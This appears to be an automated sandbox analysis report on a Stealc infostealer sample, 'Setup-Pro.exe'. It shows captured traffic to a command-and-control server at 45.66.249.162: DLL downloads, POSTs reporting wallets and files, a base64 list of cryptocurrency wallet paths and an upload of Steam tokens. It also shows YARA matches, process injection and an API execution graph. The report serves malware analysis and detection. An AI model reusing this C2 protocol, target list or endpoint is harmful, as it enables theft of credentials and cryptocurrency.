                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                              Oct 11, 2024 22:32:41.673698902 CEST97OUTGET /55145c8889ec57f2/vcruntime140.dll HTTP/1.1
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:42.144072056 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:42 GMT
                                                                                                                                                              Content-Type: application/x-msdos-program
                                                                                                                                                              Content-Length: 80880
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT
                                                                                                                                                              ETag: "13bf0-5e7ea271b0900"
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                              Oct 11, 2024 22:32:43.149009943 CEST201OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJ
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 1003
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:43.921972990 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:43 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:43.922738075 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:43 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:43.994920015 CEST467OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHI
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 267
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 2d 2d 0d 0a
                                                                                                                                                              Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="message"wallets------BGIJDGCAEBFIIECAKFHI--
                                                                                                                                                              Oct 11, 2024 22:32:44.490479946 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:44 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 2408
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                              Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                              Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8XE11 [TRUNCATED]
                                                                                                                                                              Oct 11, 2024 22:32:44.492645025 CEST465OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----IDHDGDHJEGHIDGDHCGCB
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 265
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 42 2d 2d 0d 0a
                                                                                                                                                              Data Ascii: ------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------IDHDGDHJEGHIDGDHCGCBContent-Disposition: form-data; name="message"files------IDHDGDHJEGHIDGDHCGCB--
                                                                                                                                                              Oct 11, 2024 22:32:44.970860004 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:44 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:44.985265970 CEST563OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCB
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 363
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                              Data Ascii: ------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="file"------FIJECAEHJJJKJKFIDGCB--
                                                                                                                                                              Oct 11, 2024 22:32:45.469770908 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:45 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:45.674274921 CEST203OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBA
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 114483
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Oct 11, 2024 22:32:46.799345016 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:46 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:46.842623949 CEST472OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGC
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 272
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 2d 2d 0d 0a
                                                                                                                                                              Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="message"ybncbhylepme------HIDHDGDHJEGHIDGDHCGC--
                                                                                                                                                              Oct 11, 2024 22:32:47.341236115 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:47 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              Oct 11, 2024 22:32:47.342283964 CEST472OUTPOST /9e6547173a597645.php HTTP/1.1
                                                                                                                                                              Content-Type: multipart/form-data; boundary=----AAEHIDAKECFIEBGDHJEB
                                                                                                                                                              Host: 45.66.249.162
                                                                                                                                                              Content-Length: 272
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 37 62 35 30 39 33 37 30 65 63 61 32 34 35 63 31 31 63 63 31 63 38 36 33 38 31 61 63 38 35 36 34 63 61 61 33 37 30 33 66 62 31 32 38 64 39 33 65 35 64 65 64 63 36 33 66 35 61 35 63 39 37 38 39 35 37 30 63 33 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 2d 2d 0d 0a
                                                                                                                                                              Data Ascii: ------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="token"ec7b509370eca245c11cc1c86381ac8564caa3703fb128d93e5dedc63f5a5c9789570c33------AAEHIDAKECFIEBGDHJEBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAEHIDAKECFIEBGDHJEB--
                                                                                                                                                              Oct 11, 2024 22:32:47.813687086 CEST170INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                              Date: Fri, 11 Oct 2024 20:32:47 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: keep-alive


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:0
                                                                                                                                                              Start time:16:32:02
                                                                                                                                                              Start date:11/10/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\Setup-Pro.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Setup-Pro.exe"
                                                                                                                                                              Imagebase:0xb50000
                                                                                                                                                              File size:24'551'424 bytes
                                                                                                                                                              MD5 hash:172CDB7DBA672C53F3FAE91AD779C940
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1586077537.0000000002900000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1585102260.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.1507758122.0000000002900000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1507758122.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.1507758122.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1585102260.00000000027F6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1585102260.00000000027A8000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1586077537.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.1586077537.00000000029D4000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:2
                                                                                                                                                              Start time:16:32:13
                                                                                                                                                              Start date:11/10/2024
                                                                                                                                                              Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                              Imagebase:0x4a0000
                                                                                                                                                              File size:231'736 bytes
                                                                                                                                                              MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Reset < >

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:5.8%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                Signature Coverage:4.6%
                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                Total number of Limit Nodes:40
                                                                                                                                                                execution_graph 57000 3001190 57007 30178e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 57000->57007 57002 300119e 57003 30011cc 57002->57003 57009 3017850 GetProcessHeap RtlAllocateHeap GetUserNameA 57002->57009 57005 30011b7 57005->57003 57006 30011c4 ExitProcess 57005->57006 57008 3017939 57007->57008 57008->57002 57010 30178c3 57009->57010 57010->57005 57011 30169f0 57054 3002260 57011->57054 57028 3017850 3 API calls 57029 3016a30 57028->57029 57030 30178e0 3 API calls 57029->57030 57031 3016a43 57030->57031 57186 301a9b0 57031->57186 57033 3016a64 57034 301a9b0 4 API calls 57033->57034 57035 3016a6b 57034->57035 57036 301a9b0 4 API calls 57035->57036 57037 3016a72 57036->57037 57038 301a9b0 4 API calls 57037->57038 57039 3016a79 57038->57039 57040 301a9b0 4 API calls 57039->57040 57041 3016a80 57040->57041 57194 301a8a0 57041->57194 57043 3016a89 57044 3016b0c 57043->57044 57047 3016ac2 OpenEventA 57043->57047 57198 3016920 GetSystemTime 57044->57198 57049 3016af5 CloseHandle Sleep 57047->57049 57050 3016ad9 57047->57050 57052 3016b0a 57049->57052 57053 3016ae1 CreateEventA 57050->57053 57052->57043 57053->57044 57396 30045c0 17 API calls 57054->57396 57056 3002274 57057 30045c0 34 API calls 57056->57057 57058 300228d 57057->57058 57059 30045c0 34 API calls 57058->57059 57060 30022a6 57059->57060 57061 30045c0 34 API calls 57060->57061 57062 30022bf 57061->57062 57063 30045c0 34 API calls 57062->57063 57064 30022d8 57063->57064 57065 30045c0 34 API calls 57064->57065 57066 30022f1 57065->57066 57067 30045c0 34 API calls 57066->57067 57068 300230a 57067->57068 57069 30045c0 34 API calls 57068->57069 57070 3002323 57069->57070 57071 30045c0 34 API calls 57070->57071 57072 300233c 57071->57072 57073 30045c0 34 API calls 57072->57073 57074 3002355 57073->57074 57075 30045c0 34 API calls 57074->57075 57076 300236e 57075->57076 57077 30045c0 34 API calls 57076->57077 57078 3002387 57077->57078 57079 30045c0 34 API calls 57078->57079 57080 30023a0 57079->57080 57081 30045c0 34 API calls 57080->57081 57082 30023b9 57081->57082 57083 30045c0 34 API calls 57082->57083 57084 30023d2 57083->57084 57085 30045c0 34 API calls 57084->57085 57086 30023eb 57085->57086 57087 30045c0 34 API calls 57086->57087 57088 3002404 57087->57088 57089 30045c0 34 API calls 57088->57089 57090 300241d 57089->57090 57091 30045c0 34 API calls 57090->57091 57092 3002436 57091->57092 57093 30045c0 34 API calls 57092->57093 57094 300244f 57093->57094 57095 30045c0 34 API calls 57094->57095 57096 3002468 57095->57096 57097 30045c0 34 API calls 57096->57097 57098 3002481 57097->57098 57099 30045c0 34 API calls 57098->57099 57100 300249a 57099->57100 57101 30045c0 34 API calls 57100->57101 57102 30024b3 57101->57102 57103 30045c0 34 API calls 57102->57103 57104 30024cc 57103->57104 57105 30045c0 34 API calls 57104->57105 57106 30024e5 57105->57106 57107 30045c0 34 API calls 57106->57107 57108 30024fe 57107->57108 57109 30045c0 34 API calls 57108->57109 57110 3002517 57109->57110 57111 30045c0 34 API calls 57110->57111 57112 3002530 57111->57112 57113 30045c0 34 API calls 57112->57113 57114 3002549 57113->57114 57115 30045c0 34 API calls 57114->57115 57116 3002562 57115->57116 57117 30045c0 34 API calls 57116->57117 57118 300257b 57117->57118 57119 30045c0 34 API calls 57118->57119 57120 3002594 57119->57120 57121 30045c0 34 API calls 57120->57121 57122 30025ad 57121->57122 57123 30045c0 34 API calls 57122->57123 57124 30025c6 57123->57124 57125 30045c0 34 API calls 57124->57125 57126 30025df 57125->57126 57127 30045c0 34 API calls 57126->57127 57128 30025f8 57127->57128 57129 30045c0 34 API calls 57128->57129 57130 3002611 57129->57130 57131 30045c0 34 API calls 57130->57131 57132 300262a 